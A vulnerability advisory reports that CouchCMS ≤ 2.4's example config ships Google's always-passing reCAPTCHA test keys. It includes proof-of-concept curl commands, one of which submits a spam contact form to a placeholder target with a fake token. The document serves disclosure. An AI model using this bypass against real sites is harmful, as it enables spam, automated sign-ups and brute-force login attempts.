Logo reCAPTCHA Bypass via Hardcoded Test Keys in CouchCMS ≤ 2.4

reCAPTCHA Bypass via Hardcoded Test Keys in CouchCMS ≤ 2.4

Title: reCAPTCHA Bypass via Hardcoded Test Keys in CouchCMS ≤ 2.4#

BUG_Author: security_researcher

Affected Version: CouchCMS ≤ 2.4

Vendor: CouchCMS GitHub Repository

Software: CouchCMS

Vulnerability Files:

  • couch/config.example.php

  • couch/addons/recaptcha/recaptcha.php

Description:#

  1. Hardcoded Google reCAPTCHA Test Keys:

    • In the file couch/config.example.php, the default reCAPTCHA configuration uses Google's official test keys which always return success: true for any verification request.

    • The vulnerable code at lines 160-161:

      define( 'K_RECAPTCHA_SITE_KEY', '6LeIxAcTAAAAAJcZVRqyHh71UMIEGNQ_MXjiZKhI' );
      define( 'K_RECAPTCHA_SECRET_KEY', '6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe' );

  2. Exploiting the Vulnerability:

    • These keys are Google's publicly documented test keys that bypass all CAPTCHA validation.

    • Any form protected by reCAPTCHA (contact forms, comment forms, registration forms) can be automated without solving the CAPTCHA.

    • The validation in couch/addons/recaptcha/recaptcha.php at line 82 checks $response['success'] which will always be true with test keys.

  3. Impact:

    • Automated spam submission on contact forms

    • Brute force attacks on login forms

    • Mass comment spam

    • Automated account registration

Proof of Concept:#

  1. Verify the vulnerability by sending a direct API request to Google's reCAPTCHA verification endpoint:

    curl -X POST "https://www.google.com/recaptcha/api/siteverify" \
      -d "secret=6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe" \
      -d "response=any_random_string_here"

  2. The response will always return success:

    {
      "success": true,
      "challenge_ts": "2025-12-18T09:30:31Z",
      "hostname": "testkey.google.com"
    }

  3. To exploit on a CouchCMS installation with default config, submit any form with reCAPTCHA protection using any value for the g-recaptcha-response parameter:

    curl -X POST "http://<target>/contact.php" \
      -d "name=attacker" \
      -d "email=attacker@evil.com" \
      -d "message=spam_content" \
      -d "g-recaptcha-response=bypass_string"

  4. The form submission will succeed, bypassing CAPTCHA protection entirely.

Last updated on